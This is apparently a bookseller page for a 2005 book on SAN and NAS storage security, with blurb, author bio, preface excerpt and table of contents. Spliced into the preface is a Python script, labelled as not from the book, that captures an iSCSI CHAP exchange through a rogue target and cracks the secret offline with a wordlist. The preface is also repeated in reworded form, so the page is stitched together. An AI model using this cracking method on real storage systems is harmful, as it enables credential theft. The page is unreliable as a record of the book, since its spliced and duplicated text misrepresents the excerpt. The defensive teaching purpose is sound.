Securing Storage: A Practical Guide to SAN and NAS Security / Edition 1

Overview

Systematically address your #1 enterprise security gap: storage

Securing Storage is an indispensable resource for every storage and security professional, and for anyone responsible for IT infrastructure, from architects and network designers to administrators.

You’ve invested heavily in securing your applications, operating systems, and network infrastructure. But you may have left one crucial set of systems unprotected: your SAN, NAS, and iSCSI storage systems. Securing Storage reveals why these systems aren’t nearly as secure as you think they are, and presents proven best practices for hardening them against more than 25 different attacks.

Securing storage is crucial to protecting intellectual property and trade secrets and complying with regulations ranging from Sarbanes-Oxley and HIPAA to Gramm-Leach-Bliley and SEC Rule 17a4. This book offers a complete blueprint for protecting all your storage systems–and all the data stored on them.

Most enterprises have failed to adequately address one crucial component of IT security: storage. The storage industry has largely failed to deliver secure solutions, and many IT professionals simply assume that security can be handled elsewhere. The result is a gaping security hole: it’s now far easier for internal attackers to compromise storage devices than to attack applications or operating systems. Now, for the first time, one of the world’s top storage security experts systematically reveals the weaknesses in SAN and NAS security–and offers robust, practical solutions.

Drawing on years of leading-edge research, renowned storage architect and security researcher Himanshu Dwivedi explains why SAN and NAS systems have become an open target for unauthorized access and data compromise–and why “security by obscurity” strategies will fail to protect storage, just as they’ve failed elsewhere. Dwivedi offers expert, step-by-step guidance for evaluating your own storage environment, designing security into it, implementing storage security best practices, and optimizing the security settings on any shared storage device. He also presents a full chapter of real-world case studies.

Coverage includes

• Recognizing vulnerabilities that arise from inadequate perimeter security

• Understanding where attacks on storage devices typically originate

• Testing storage network security and audit compliance

• Protecting against SAN attacks: WWN spoofing, name server pollution, session hijacking, zoning hopping, e-port and f-port replication, LUN mask subversion, and more

• Protecting NAS systems against attacks on Windows CIFS and Unix/Linux NFS protocols

• Defending against iSCSI attacks, from iQN spoofing to CHAP message reflection and offline password brute forcing

• Securing individual Fibre Channel and iSCSI SANs, NAS devices, and more


Product Details

  • ISBN-13: 9780321349958
  • Publisher: Addison-Wesley
  • Publication date: 11/11/2005
  • Edition description: New Edition
  • Edition number: 1
  • Pages: 560
  • Product dimensions: 7.25 (w) x 9.58 (h) x 1.34 (d)

Meet the Author

Himanshu Dwivedi is a founding partner of iSEC Partners, a digital security services and products organization. Before forming iSEC Partners (http://www.isecpartners.com), Himanshu was the Technical Director for @stake's San Francisco security practice, a leader in application and network security. His professional experience includes application programming, infrastructure security, and secure product design with an emphasis on storage risk assessment.

Himanshu is considered to be an industry expert in storage security. He has been published in major journals, magazines, and news articles regarding his storage security research. Himanshu has been invited to speak at several security and storage conferences in the United States and in Asia, such as Black Hat and Storage Networking World. Although specializing in SAN and NAS security, Himanshu's research includes storage technologies such as Fibre Channel, iSCSI, NFS, and CIFS as well as storage devices such as Fibre Channel switches, host bus adapters, storage controllers, iSCSI initiators, NAS filers, iSNS servers, NAS gateways, and encryption appliances. Himanshu has also written several tools for storage security assessment, including the iSCSI CHAP Password Tester and the Storage Port Scanner.

Himanshu currently has a patent pending on a storage design architecture that he co-developed with other professionals (U.S. Patent Serial No. 10/198,728). The patent is a security design for Fibre Channel storage networks. Himanshu has also contributed to two other books: the "Security Considerations" chapter of Storage Networks: The Complete Reference (McGraw-Hill/Osborne), and Implementing SSH: Strategies for Optimizing the Secure Shell (Wiley Publishing). Furthermore, Himanshu has published two security white papers, "Securing Intellectual Property" (http://www.vsi.org/resources/specs/ippwp310.pdf) and "Storage Security" (http://www.atstake.com/research/reports/acrobat/atstake_storage_networks.pdf).

© Copyright Pearson Education. All rights reserved.


Read an Excerpt

Preface

Storage security is the two-ton secret in your data center. It is the big white elephant that you walk by every day—you can see it from your desktop, you look for it on your servers, and you even rest your coffee mug on it every now and then. Despite the fact that the elephant is very large, heavy (two tons), albino (white), and sitting in the middle of the data center, it is the dirty little secret that no one speaks about. So why do people ignore such a large entity that can significantly damage their enterprise? The answers, as well as the solutions, are addressed in this book.

The storage industry is missing the mark in terms of security, data protection, availability, integrity, and compliance. The absence of security in storage makes it an open target for unauthorized access and data compromise. The most prominent security control for storage networks today is the lack of knowledge most attackers have about the technology. Lack of knowledge, better known as security by obscurity, never stands the test of time, as shown by other technologies that have been through the same cycle, such as application development, voice over IP, wireless, and even electronic voting stations. Furthermore, security by obscurity never passes a governmental compliance test for data protection or integrity.

The book's primary goal is to discuss security weaknesses and acceptable solutions for Storage Area Networks (SANs) and Network Attached Storage (NAS). The book will discuss the mechanisms to evaluate your own storage network, design security into storage networks, and implement security settings on common storage devices. The book will also cover the standard practices for securing storage by discussing strategies that will minimize security weaknesses in SAN and NAS architectures.

Before we dive deeper, let's define storage security for a moment. Security is an entity that can be applied to different things, such as hosts, devices, networks, and communication mediums. Security can also be applied by several methods, such as encryption, access controls, authentication, checksums, logging, or dedicated products. Similarly, storage is an entity that is also applied in many ways. It can be applied as media (tapes, CD-ROMs, disk drives, USB drives), a communications medium (Internet Protocol, Fibre Channel, iSCSI), or even a network (Network Attached Storage or Storage Area Networks). Based on their different descriptions, security and storage traditionally are two items that are not usually paired together. Storage concentrates on holding data, while security concentrates on protecting data. Nevertheless, it is interesting that both entities address data needs and concerns, yet have not been addressed in a complementary fashion.

There are several reasons why security and storage are two strangers. One incorrect assumption is that storage does not need security because it has already been addressed elsewhere in the network, which unfortunately is not true. It often goes unnoticed that it is easier for internal attackers to compromise storage devices than applications or operating systems. For example, unlike most applications and operating systems, many storage devices do not even require authentication to get access to large volumes of data, a fact that would never pass most security audits. Furthermore, if an internal server has ever been affected by a virus or worm, the perimeter of the network is probably not as secure as a Visio diagram may make it look. The fact is that the network perimeter has disappeared with the advent of wireless networks, remote VPN users, site-to-site VPNs with business partners, back-end support connections, and internal unauthorized users such as contractors/consultants. This fact, combined with the large number of internal data heists occurring every month, makes storage a prime target of attackers. Compliance entities have also realized that data is not protected adequately and its integrity is at risk on the storage network.

It is often overlooked that perimeter security controls are easily subverted to gain access to entities connected to the storage network, thus creating an open gateway. It is also assumed that unauthorized users attack from their own machines, but in practice they attack from compromised management servers, administrator workstations, or compromised applications. Another assumption is that if any entity, such as an application data owner, can gain access to the stored data, it must have been authorized to do so; that is, the ability to access data equates to the authorization to access data, which again is simply not true (especially for regulated data). For example, if an Exchange administrator has access to the Exchange server, it does not mean that he or she is authorized to read everyone's email. Likewise, the ability of unauthenticated users to connect directly to the storage network and view, copy, and delete data does not mean all users should have that authority. These assumptions also carry over to different organizational groups. Security groups are often too preoccupied with network and application attacks to fully understand the high risks of insecure storage. Additionally, the storage group's lack of information security background, combined with its focus on performance and capacity concerns, makes security a neglected entity. All of these assumptions and groups make it hard to realize that a large amount of data is sitting wide open in the storage network for anyone to compromise.

What Does It Mean to Secure Storage?

What does it mean to secure storage? For the purposes of this book, securing storage is the process of assessing, implementing, and testing security on existing SAN and NAS architectures. The book will focus on the following items:

  • How do I assess my storage network for best practices?
  • How do I test my storage network against attacks and compliance breaches?
  • How do I implement security on my storage network based on industry standards?

The book will cover three primary themes. The first theme is to provide guidance and assessment techniques for storage networks. The second theme is to provide testing procedures for SAN and NAS architectures. The third theme is to discuss the security solutions for each attack class and security exposure currently present on storage networks and devices. The book will also discuss many security specifications and industry standards and how they affect storage security overall.

SAN and NAS Security

Storage Area Networks (SANs) and Network Attached Storage (NAS) are two types of storage networks. SANs have been based primarily on Fibre Channel (FC), with iSCSI becoming more popular, and NAS architectures have primarily been based on IP using CIFS or NFS. Both types of storage networks have one thing in common: neither is used just for backup anymore. They hold live production data.

Data from the storage network is being presented to applications and hosts in all parts of the network, many of which do not have a high level of security. For example, a Fibre Channel SAN may be connected to a web or database cluster that is available to the Internet or the internal network, allowing a single compromised web/database server to be the gateway to the SAN. If the SAN were using iSCSI, the storage device would be even easier to break into: the attacker would only need to connect to the IP network and then to the iSCSI storage device, bypassing the database application and web server altogether. Furthermore, a NAS device might be holding medical data (patient information) that can be accessed by authorized doctors; however, it is also stored in clear text, allowing any system administrator to access the sensitive data.

The need for SAN and NAS security is long overdue. This book will describe the specific implementation steps to deploy SAN and NAS security options, while also discussing the different ways to fully optimize current storage architectures. This book can also be used by organizations that have deployed a storage network and are interested in learning more ways to secure it.

Block Data Versus File Data

In order to understand security threats for storage networks, it is important to understand the differences between file-level data and block-level data. NAS storage devices support file-level data, which is the traditional type of data we are accustomed to on PC systems. NAS devices using file-level data present file systems remotely over the network. An entire file system, a partial file system, or even a single individual file can be presented to a remote server over the network. File-level data using NFS and CIFS (SMB) are the traditional methods of deployment. SAN storage devices use block data, where an entire SCSI logical unit (LUN) is presented over the network. Unlike file-level data, block data does not present individual files, folders, or even file systems, but the entire drive (block device) itself (usually 50 to 100 gigabytes in size at a time). For example, think of file-level data as access to a remote file system (partial or full); think of block-level data as access to an entire hard drive (regardless of file system type) over the network. Block data is like having two or three more hard drives inside a server, but presented to the server over the network using iSCSI or Fibre Channel rather than installed inside the machine on IDE or SCSI ribbon cables.

The other difference between file-level and block-level data is that file-level data (NAS devices) supports multiple systems at once and block data usually does not. Multiple machines or users can access the same remote file system (NFS or CIFS) at the same time, as long as it is formatted with a file system type the systems support (such as NTFS or FAT for Windows). On the other hand, block data is not meant to have multiple systems connected to a single block of data at the same time. (Note: Some Fibre Channel and iSCSI SANs do support multiple connections to the same block data, but it is not the default.) It would be difficult for a single hard drive to have two IDE or SCSI ribbon cables connected to two separate servers; similarly, block data does not usually have multiple servers connected to it at the same time. It is possible for multiple systems to connect to the same block data repository over iSCSI or Fibre Channel; however, without a cluster-aware file system it results in a denial-of-service or data-corruption problem, because two separate servers are each trying to mount and write the same block data as if they owned it. Until one of the servers stops sending requests for the block data, the other will not be able to use it reliably either.

The key idea to understand with either file or block data is that they are both data targets that contain large amounts of data viewable to any attacker or unauthorized user. File data is what most systems are accustomed to. Block data, however, is just as valuable to an attacker (if not more) since it contains large volumes of data but in block format, which is just as easy to mount and read as file-level data but requires different mounting and reading steps.

The following table briefly summarizes the difference between block and file data.

Block Data                              File Data
SANs                                    NASs
Block format (hard drive)               File format (file system)
Usually one system per block            Multiple systems per folder
SCSI via iSCSI or Fibre Channel         NFS or CIFS via IP
New hard drives over the network        New file systems over the network

[Figure: the top figure shows a mounted drive (Disk 1) for block data; the bottom figure shows a mounted file system (X:\) for file data.]

Why Storage Security?

The necessity for storage security is similar to the need for security on any other entity of high value in your organization. For example, the popularity of patching utilities and anti-virus applications is not necessarily due to their ability to provide security protection (even though that is an important benefit), but rather to their ability to improve uptime and availability of computer systems, networks, and data integrity. Similarly, the unavailability of a storage network or the loss of integrity of its data, which would leave an organization in a state of disarray, has a much bigger impact than an infected laptop or an offline application. A good example of this is the Sasser worm released in 2004 that targeted Microsoft operating systems. Although the worm was intended for Windows, many storage devices that support Windows protocols, such as CIFS and SMB, were also vulnerable, which essentially made the storage device unusable until a full system reboot and patch. The risk of data being unavailable, corrupted, abused, or even deleted will cause tremendous financial harm and storage downtime for many organizations. Furthermore, the regulatory issues that involve storage networks are confusing at best, requiring a resource to guide everyone through the process.

This book's primary attraction is its ability to discuss, demonstrate, and prioritize the storage security issues that every organization faces. The book will not use high-level or abstract language that fails to provide any details, but rather will provide an abundance of security details to allow readers to finally understand what the real issues are with storage security and how they can assess the risk for themselves. The book will also provide details to distinguish the high-risk/high-impact issues from low-risk/nominal-impact issues.

A key purpose for the book is to provide a clear understanding of the technology. Storage security is a relatively new industry and can be an overwhelming topic. Several years ago when I began researching storage and security, there were no storage security products, web sites, or whitepapers about storage security. There were only a few people willing to talk to me about the seriousness of storage security. Years later, there is not only an entire industry on securing storage, with large companies like Symantec and Veritas merging together, but with its new popularity, there is a lot more confusion.

The need to secure storage is important on many levels. From a security perspective, many organizations (and their security departments), are not aware of the data protection issues surrounding storage. From the storage perspective, many storage administrators are unaware of the security issues that will affect system uptime and data availability.

Another reason why storage security is needed is for ease of comprehension. There are many sources that discuss attack classes in storage, but few actually provide risk exposure descriptions. A key goal of this book is not to force arbitrary risk levels on your organization, but to describe the threat vectors and attack surface in detail and allow readers to deduce their own risk based on the outcomes of these possible attacks. Readers will find out that security attacks don't change; they get modified and improved (just like viruses and worms). History has shown that the attack classes that affected networks in the 1990s also affected applications in the 2000s. Similarly, the same attack classes, such as segmentation weaknesses, poor session maintenance, and poor authentication, have also affected storage networks. However, a successful attack on storage equates to data loss or outright compromise.

By the end of this book, readers will have a very detailed guide to securing storage and understanding attacks.

Regulations and Storage

Regulatory issues facing storage have created significant legal issues for many financial, e-commerce, and medical organizations. New acts and policies such as the Health Insurance Portability and Accountability Act (HIPAA), Sarbanes-Oxley, the Gramm-Leach-Bliley Act (GLBA), SEC Rule 17a-4, DoD (Department of Defense) 5015, and California's SB1386 (Senate Bill 1386) are making a sizable impact on how the storage of data must be protected from unauthorized users, even if those unauthorized users are not hackers but internal employees. Furthermore, as internal audit groups and external IT auditors begin to understand that sensitive data is residing in the storage network/devices (as opposed to servers or desktops), the focus will shift away from operating system security to storage networking security.

Government regulations primarily focus on security controls and auditing practices. A key issue for many storage networks, devices, and protocols is their lack of any security controls to protect data at rest or in flight. Additionally, government regulations don't distinguish between controls against outside attackers and controls against malicious internal employees. The fact that data is easier to compromise on a storage filer than on an operating system only adds to the storage security problem.

Regulations have highlighted an overlying issue of data protection. Data, whether it is financial data, non-public private information, or medical data, needs to be protected from unauthorized external and internal entities at all times. Government regulations have only helped raise the concerns that have existed since the first SAN or NAS network.

Best-Practice Benefits

Parts of certain chapters in this book are solely dedicated to best practices. Best practices are important in order to understand standard methods of secure deployment; however, they should not be used as inflexible guidelines. Implementation of security standards and practices will depend on the details and specifics of a storage network.

Best practices can be best described as items that are a prerequisite in order to deploy an acceptable amount of security in any given entity. Some of the sample best practices to secure storage are as follows:

  • High-level architecture (defense in depth)
  • Multi-layer architecture
  • Authentication with authorization
  • Encryption
  • Integrity
  • Auditing
  • Detailed implementation guidelines
  • Node hardening
  • Zoning
  • LUN masking
  • CT/CHAP authentication
  • SSL and IPSec encryption
  • At-rest encryption (AES) with integrity hashes (SHA-1)
  • Management access
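The "CT/CHAP authentication" item above is only as strong as the CHAP secret behind it, which is the point of the iSCSI "offline password brute forcing" attack listed in the book's coverage. The following is an added example, not code from the book or from the author's iSCSI CHAP Password Tester. It implements RFC 1994 CHAP with MD5 (the algorithm iSCSI uses), models a hypothetical initiator and a rogue target that simply picks a challenge and records the answer, and then runs an offline dictionary attack against the captured triple. The Initiator class, the IQNs, the secrets and the wordlist are all constructed for the demo.

```python
"""Offline dictionary attack on an iSCSI CHAP exchange (added example).

iSCSI uses RFC 1994 CHAP with MD5: the response is MD5(CHAP_I || secret || CHAP_C).
Anyone who holds one (id, challenge, response) triple can test guesses for the
secret offline, with no rate limiting. All values below are constructed for the demo.
"""
import hashlib
import os
from typing import Iterable, Optional, Tuple


def chap_response(chap_id: int, secret: bytes, challenge: bytes) -> bytes:
    """CHAP_R = MD5(CHAP_I || secret || CHAP_C), as RFC 1994 defines it."""
    return hashlib.md5(bytes([chap_id & 0xFF]) + secret + challenge).digest()


class Initiator:
    """Hypothetical iSCSI initiator: answers any CHAP challenge with its secret."""

    def __init__(self, iqn: str, secret: bytes) -> None:
        self.iqn = iqn
        self._secret = secret

    def answer(self, chap_id: int, challenge: bytes) -> Tuple[str, bytes]:
        # A real initiator returns CHAP_N (the user name) and CHAP_R.
        return self.iqn, chap_response(chap_id, self._secret, challenge)


def rogue_target_capture(initiator: Initiator, chap_id: int = 1) -> Tuple[int, bytes, bytes]:
    """A rogue target (the iQN-spoofing case) picks the challenge and records the answer.

    No packet capture is needed: the authenticator chooses CHAP_C, so any target the
    initiator is willing to log in to gets a crackable triple for free. The same
    triple can also be sniffed from an unencrypted login on the IP network.
    """
    challenge = os.urandom(16)
    _, response = initiator.answer(chap_id, challenge)
    return chap_id, challenge, response


def crack_chap(chap_id: int, challenge: bytes, response: bytes,
               wordlist: Iterable[str]) -> Optional[str]:
    """One MD5 per guess; returns the secret if it is in the wordlist, else None."""
    for candidate in wordlist:
        if chap_response(chap_id, candidate.encode(), challenge) == response:
            return candidate
    return None


# Constructed sample wordlist; not from any real device or dictionary.
WORDLIST = ["password", "admin", "iscsi", "storage", "storage123", "Tr0ub4dor&3"]


def demo_weak_secret() -> Optional[str]:
    """Weak, human-chosen CHAP secret: recovered on the fifth guess."""
    victim = Initiator("iqn.2005-11.com.example:host1", b"storage123")
    return crack_chap(*rogue_target_capture(victim), WORDLIST)


def demo_random_secret() -> Optional[str]:
    """128-bit random CHAP secret: the same wordlist attack recovers nothing."""
    victim = Initiator("iqn.2005-11.com.example:host2", os.urandom(16).hex().encode())
    return crack_chap(*rogue_target_capture(victim), WORDLIST)


if __name__ == "__main__":
    print("weak secret recovered:", demo_weak_secret())
    print("random secret recovered:", demo_random_secret())
```

The attack costs one MD5 per guess and runs entirely offline, so a dictionary-quality secret falls in seconds; nothing on the target can throttle it. The practical reading of the list above is therefore: use a long random secret per initiator (and a different secret in each direction for mutual CHAP), and run the session over IPsec so that neither the CHAP exchange nor the block data it protects is visible on the wire.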

Who Should Read This Book

This book targets individuals who are responsible for IT infrastructure. Examples of these individuals are IT managers, storage administrators, network designers, architects, and engineers who want to evaluate security in storage architectures. It will also serve the needs of security consultants, engineers, architects, managers, auditors, trainers, and technical marketing managers who want to update their backgrounds in storage security.

The book is targeted toward readers who want to learn the common "how-tos" of securing storage. Readers requiring an essential reference guide can use the book as their primary resource. Generally speaking, this book is targeted for three types of individuals:

  • Individuals who are interested in establishing or expanding their knowledge of securing storage
  • Individuals who are interested in learning how to assess and audit their own storage networks
  • Individuals who are looking for best practices or new strategies for storage security

The book's audience will range from novice readers who are looking for the basics behind storage architectures, networking, and LANs, to moderately skilled administrators looking to gain information on Fibre Channel communication, iSCSI, and Internet Protocol.

Readers will benefit from the book in several different ways. First, readers will be able to remove the confusion from securing storage. Readers will be able to qualify the risk of their storage network with a clear description of the security issues in storage. Readers will also learn the security principles for designing, testing, and evaluating storage networks. Several chapters have hands-on self-assessment steps for critical security threats and vulnerabilities. Additionally, best practices security measures are discussed in the context of data availability, integrity, and compliance requirements. Finally, readers will understand the security concerns for storage and be able to determine the impact of each issue.

This book will provide readers with the data center's guide to analyzing, testing, and implementing SAN and NAS security. This book will cover common "how-tos," provide the all-essential "reference steps," and provide recommendations for storage security best practices.

The book is not necessarily meant to be read from start to finish, but instead can be a quick reference, where individual chapters are self-supporting without knowledge of prior chapters. For example, if a reader needs to understand how to secure a Brocade Fibre Channel switch, he can turn directly to Chapter 4, "SANs: Zone and Switch Security." The book can provide insight for the following types of individuals:

  • Individuals interested in a practical method to secure SAN and NAS networks
  • Individuals interested in assessing the security of their existing SAN and NAS networks
  • Individuals interested in testing the security of their existing SAN and NAS networks
  • Individuals interested in expanding their security knowledge on emerging storage technologies, such as encryption, authentication, and management
  • Individuals interested in understanding how governmental regulations and compliance requirements affect storage

How This Book Is Organized

This book is organized into five parts consisting of fourteen chapters that include details on SAN security, NAS security, iSCSI security, storage defenses, policies, trends, and case studies.

The first three parts discuss core issues with SAN and NAS security, attacks against SAN and NAS devices, and SAN and NAS security solutions. These chapters target some of the most important topics in securing storage, as well as testing procedures for each attack class.

Chapter 1 begins with an overview of storage security, covering its basic premise, the problems encountered, typical uses, and future trends. Additionally, an overview of security and storage standards is discussed.

Chapters 2 through 4 discuss SAN security risks, including weaknesses of Fibre Channel (FC) and adjoining devices, such as switches and host-bus adapters (HBAs). Additionally, these chapters discuss SAN attacks, self-assessment steps (which allow readers to perform checks against their storage architecture), and mitigating solutions.

Chapters 5 through 7 are similar to Chapters 2 through 4, but focus on NAS architectures instead of SANs. Chapter 5 discusses the risks associated with NAS storage devices using IP protocols such as NFS and CIFS.

Chapters 6 and 7 discuss CIFS and NFS security issues, attacks, self-assessment steps, and mitigating solutions for storage architectures.

Chapter 8 discusses iSCSI security, including an overview of iSCSI communication, risks associated with iSCSI storage devices, and a discussion of the iSCSI attacks.

Part Four of the book focuses on storage defenses. Chapter 9 is a discussion on securing Fibre Channel SANs, Chapter 10 discusses the security of NFS/CIFS NAS, and Chapter 11 discusses the methods to secure iSCSI SANs. These chapters concentrate on how to take existing storage devices and harden them with the controls they already provide. Part Five of the book shifts focus from SAN and NAS security risks and attacks to larger storage security issues, such as emerging security technologies, regulations, and case studies. These three chapters discuss security from the adherence perspective, both from the governmental aspect and from best practices. Chapter 12 discusses some of the major governmental policies that affect storage architectures. Chapter 13 discusses how to audit your storage network against government compliance requirements and security best practices. Finally, Chapter 14 is a discussion of real-world case studies in storage environments. The examples describe SAN and NAS architectures with the optimal balance of security and functionality.

How This Book Is Written

The book is written to address the topic of securing storage from a technology perspective. It does not discuss the paper policies and procedures that should be in place, nor does it describe the human processes of security as they pertain to storage. It also does not discuss storage security at a high level, but specifically discusses how storage systems, networks, and protocols are affected by security. The key difference this book offers is not to generically say storage has security problems and gloss over the details, but to start with the details first.

The book discusses the security weaknesses, threats, exploits, and attacks of storage systems, networks, and technologies in Chapters 2 through 8. After the discussion is complete, the book discusses the mitigating solutions of each prior attack identified in Chapters 9 through 14. The reason for a deep discussion of the attacks is because it is very difficult to discuss solutions only without any context of the problem. Although some vendors will not appreciate the fact that this book exposes problems, it is not written to embarrass any vendor or to prevent end-users from adopting storage devices, but instead to show organizations why certain security mitigations and solutions need to be in place when deploying a storage network. For example, after a virus infects a user's machine, it is easier to discuss why anti-virus software and host hardening procedures are very important items. The same idea applies to storage. Organizations will understand why taking active steps to secure storage is important after reviewing the attacks in Fibre Channel, iSCSI, CIFS, and NFS.

The book makes an attempt to classify the risk of each identified problem; however, the discussion is limited because risk is best measured when applied to specific scenarios and not generic examples. Many attacks shown in this book can be classified as low risk, but they are still discussed to expose the reader to the security problem. Conversely, many attacks shown in the book are also high risk and are shown to its full extent and detail.

The book is not vendor specific, but rather protocol specific (Fibre Channel and iSCSI for SANs and NFS and CIFS for IP NAS).

The book holds storage systems, networks, and protocols to the same standard of security as operating systems, wireless networks, and application security. Storage security strengths are discussed to show the reader the positive security aspects of storage; however, it also shows failed or poor security attempts in storage systems, networks, and protocols. The book does not give storage devices/networks any "breaks" since it is an emerging technology. Any system and/or network that controls a large portion of an organization's data must be held to the same high security standard expected from operating system vendors or even application product vendors.

Finally, the book is written in the context of full disclosure. The goal is to allow each reader to receive enough information to read, perform, and analyze each security problem and each discussion about the mitigating solution. This model should allow the reader to make risk acceptability decisions based on their own storage environment.

© Copyright Pearson Education. All rights reserved.

Read More Show Less

Table of Contents

Ch. 1 Introduction to storage security 1
Ch. 2 SANs: Fibre Channel security 31
Ch. 3 SANs: LUN masking and HBA security 71
Ch. 4 SANs: zone and switch security 105
Ch. 5 NAS security 149
Ch. 6 NAS: CIFS security 163
Ch. 7 NAS: NFS security 237
Ch. 8 SANs: iSCSI security 275
Ch. 9 Securing Fibre Channel SANs 337
Ch. 10 Securing NAS 369
Ch. 11 Securing iSCSI 401
Ch. 12 Compliance, regulations, and storage 429
Ch. 13 Auditing and securing storage devices 451
Ch. 14 Storage security case studies 495

Preface

Storage security is the two-ton secret in your data center. It is the big white elephant that you walk by every day—you can see it from your desktop, you look for it on your servers, and you even rest your coffee mug on it every now and then. Despite the fact that the elephant is very large, heavy (two tons), albino (white), and sitting in the middle of the data center, it is the dirty little secret that no one speaks about. So why do people ignore such a large entity that can significantly damage their enterprise? The answers, as well as the solutions, are addressed in this book.

The storage industry is missing the mark in terms of security, data protection, availability, integrity, and compliance. The absence of security in storage makes it an open target for unauthorized access and data compromise. The most prominent security control for storage networks today is the lack of knowledge many attackers have about the technology. Lack of knowledge, better known as security through obscurity, never stands the test of time, as other technologies have shown: application development, voice over IP, wireless, and even electronic voting machines. Furthermore, security through obscurity never passes a governmental compliance test for data protection or integrity.

The book's primary goal is to discuss security weaknesses and acceptable solutions for Storage Area Networks (SANs) and Network Attached Storage (NAS). The book will discuss the mechanisms to evaluate your own storage network, design security into storage networks, and implement security settings on common storage devices. The book will also cover the standard practices for securing storage by discussing strategies that will minimize security weaknesses in SAN and NAS architectures.

Before we dive deeper, let's define storage security for a moment. Security can be applied to different things, such as hosts, devices, networks, and communication media. It can also be applied by several methods, such as encryption, access controls, authentication, checksums, logging, or dedicated products. Similarly, storage takes many forms. It can be media (tapes, CD-ROMs, disk drives, USB drives), a communications medium (Internet Protocol, Fibre Channel, iSCSI), or even a network (Network Attached Storage or Storage Area Networks). Given these different descriptions, security and storage traditionally are not paired together. Storage concentrates on holding data, while security concentrates on protecting data. Nevertheless, it is interesting that both address data needs and concerns, yet have not been addressed in a complementary fashion.

There are several reasons why security and storage are two strangers. One incorrect assumption is that storage does not need security because it has already been addressed elsewhere in the network, which unfortunately is not true. It often goes unnoticed that it is easier for internal attackers to compromise storage devices than applications or operating systems. For example, unlike most applications and operating systems, many storage devices do not even require authentication to get access to large volumes of data, a fact that would never pass most security audits. Furthermore, if an internal server has ever been affected by a virus or worm, the perimeter of the network is probably not as secure as a Visio diagram makes it look. The fact is that the network perimeter has disappeared with the advent of wireless networks, remote VPN users, site-to-site VPNs with business partners, back-end support connections, and internal unauthorized users such as contractors and consultants. This fact, combined with the large number of internal data heists occurring every month, makes storage a prime target for attackers. Compliance entities have also realized that data is not protected adequately and that its integrity is at risk on the storage network.

It is often overlooked that perimeter security controls are easily subverted to gain access to entities connected to the storage network, thus creating an open gateway. It is also assumed that unauthorized users attack from their own machines, but in practice they attack from compromised management servers, administrator workstations, or compromised applications. Another assumption is that if any entity, such as an application data owner, can gain access to the stored data, it must have been authorized to do so; that is, the ability to access data equates to the authorization to access it, which is simply not true (especially for regulated data). For example, an Exchange administrator who has access to the Exchange server is not thereby authorized to read everyone's email. Likewise, the fact that unauthenticated users can connect directly to the storage network and view, copy, and delete data does not mean all users should have that authority. These assumptions carry over to the different organizational groups. Security groups are often too preoccupied with network and application attacks to fully understand the high risks of insecure storage. Additionally, the storage group's lack of an information security background, combined with its focus on performance and capacity, makes security a neglected entity. Together, these assumptions make it hard to realize that a large amount of data is sitting wide open in the storage network for anyone to compromise.

What Does It Mean to Secure Storage?

What does it mean to secure storage? For the purposes of this book, securing storage is the process of assessing, implementing, and testing security on existing SAN and NAS architectures. The book will focus on the following items:

  • How do I assess my storage network for best practices?
  • How do I test my storage network against attacks and compliance breaches?
  • How do I implement security on my storage network based on industry standards?

The book will cover three primary themes. The first theme is to provide guidance and assessment techniques for storage networks. The second theme is to provide testing procedures for SAN and NAS architectures. The third theme is to discuss the security solutions for each attack class and security exposure currently present on storage networks and devices. The book will also discuss many security specifications and industry standards and how they affect storage security overall.

SAN and NAS Security

Storage Area Networks (SANs) and Network Attached Storage (NAS) are the two types of storage networks. SANs have been based primarily on Fibre Channel (FC), with iSCSI becoming more popular, and NAS architectures have primarily been based on IP using CIFS or NFS. Both types of storage networks have one thing in common: SANs and NAS are no longer used only for backup; they hold live production data.

Data from the storage network is presented to applications and hosts in all parts of the network, many of which do not have a high level of security. For example, a Fibre Channel SAN may be connected to a web or database cluster that is available to the Internet or the internal network, allowing a single compromised web or database server to be the gateway to the SAN. If the SAN were using iSCSI, the storage device would be easier still to break into: the attacker would only need to connect to the IP network and then to the iSCSI storage device, bypassing the database application and web server altogether. Furthermore, a NAS device might be holding medical data (patient information) that is meant to be accessed only by authorized doctors; however, it is stored in clear text, allowing any system administrator to access the sensitive data.

The need for SAN and NAS security is long overdue. This book will describe the specific implementation steps to deploy SAN and NAS security options, while also discussing the different ways to fully optimize current storage architectures. This book can also be used by organizations that have deployed a storage network and are interested in learning more ways to secure it.

Block Data Versus File Data

In order to understand security threats to storage networks, it is important to understand the difference between file-level data and block-level data. NAS storage devices serve file-level data, the traditional type of data we are accustomed to on PC systems. NAS devices present file systems remotely over the network: an entire file system, part of one, or even a single file can be presented to a remote server. NFS and CIFS (SMB) are the traditional protocols for file-level data. SAN storage devices serve block data, where an entire SCSI logical unit (LUN) is presented over the network. Unlike file-level data, block data does not present individual files, folders, or even file systems, but the drive itself as a sequence of blocks (usually 50 to 100 gigabytes at a time). Think of file-level data as access to a remote file system (partial or full) and block-level data as access to an entire hard drive (regardless of file system type) over the network. Block data is like having two or three more hard drives inside a server, except that they are presented to the server over the network using iSCSI or Fibre Channel rather than installed inside the machine on IDE or SCSI ribbon cables.

The other difference between file-level data and block-level data is that file-level data (NAS devices) supports multiple systems and block data usually does not. Multiple machines or users can access the same remote file system (NFS or CIFS) at the same time, as long as they speak the protocol the device exports; the on-disk format of the device itself (NTFS, FAT, or a vendor file system) is hidden from them. Block data, on the other hand, is not meant to have multiple systems connected to a single block device at the same time. (Note: Some Fibre Channel and iSCSI SANs do support multiple connections to the same block data, but it is not the default.) Just as a single hard drive cannot usefully have two IDE or SCSI ribbon cables connected to two separate servers, block data does not usually have multiple servers connected to it at once. It is possible for multiple systems to connect to the same block device over iSCSI or Fibre Channel, but unless the servers run a cluster-aware file system the result is a denial-of-service problem or outright corruption: each server caches and writes file system metadata without knowing about the other. Until one of the servers stops using the block device, the other cannot safely access it.

The key idea to understand with either file or block data is that they are both data targets that contain large amounts of data viewable to any attacker or unauthorized user. File data is what most systems are accustomed to. Block data, however, is just as valuable to an attacker (if not more) since it contains large volumes of data but in block format, which is just as easy to mount and read as file-level data but requires different mounting and reading steps.

The following table briefly summarizes the difference between block and file data.

Block Data                            File Data
SANs                                  NASs
Block format (hard drive)             File format (file system)
Usually one system per block          Multiple systems per folder
SCSI via iSCSI or Fibre Channel       NFS or CIFS via IP
New hard drives over the network      New file systems over the network

[Figure: the top figure shows a mounted drive (Disk 1) for block data; the bottom figure shows a mounted file system (X:\) for file data.]
